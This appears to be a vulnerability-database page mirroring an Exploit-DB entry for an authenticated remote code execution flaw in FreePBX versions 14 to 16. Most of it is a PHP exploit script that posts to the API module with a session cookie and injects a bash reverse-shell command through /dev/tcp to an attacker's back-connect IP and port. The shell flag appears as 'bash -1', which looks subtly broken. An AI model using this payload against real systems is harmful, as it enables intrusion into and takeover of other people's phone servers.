header-logo
Suggest Exploit
vendor:
FreePBX
by:
Cold z3ro
6.1
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: FreePBX
Affected Version From: FreePBX version 14
Affected Version To: FreePBX version 16
Patch Exists: NO
Related CWE:
CPE: a:freepbx:freepbx
Metasploit:
Other Scripts:
Platforms Tested: Tested on versions 14, 15, and 16
2024

FreePBX 16 – Authenticated Remote Code Execution (RCE)

The FreePBX versions 14, 15, and 16 are vulnerable to an Authenticated Remote Code Execution (RCE) exploit. By exploiting this vulnerability, an attacker can execute arbitrary code on the target system. This exploit allows an attacker to execute commands on the target system, potentially leading to a full compromise.

Mitigation:

To mitigate this vulnerability, it is recommended to update FreePBX to a patched version provided by the vendor. Additionally, ensure that strong authentication mechanisms are in place to prevent unauthorized access.
Source

Exploit-DB raw data:

# Exploit Title: FreePBX 16 -  Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Cold z3ro
# Date: 6/1/2024
# Tested on: 14,15,16
# Vendor: https://www.freepbx.org/

<?php
///
/// FREEPBX [14,15,16] API Module Authenticated RCE 
/// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI
/// Cod[3]d by Cold z3ro 
///
$url = "10.10.10.186"; // remote host
$backconnectip = "192.168.0.2";
$port = "4444"; 
$PHPSESSID = "any valid session even extension";

	echo "checking $url\n";
	$url = trim($url);
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs');
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
	curl_setopt($ch, CURLOPT_TIMEOUT, 2);
	curl_setopt($ch, CURLOPT_HTTPHEADER, [
		'Referer: http://'.$url.'/admin/config.php?display=api',
		'Content-Type: application/x-www-form-urlencoded',
	]);
	curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID);
	curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)');
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

	echo $response = curl_exec($ch)."\n";

	curl_close($ch);

?>

Navigation

Suggest Exploit

Services By CQR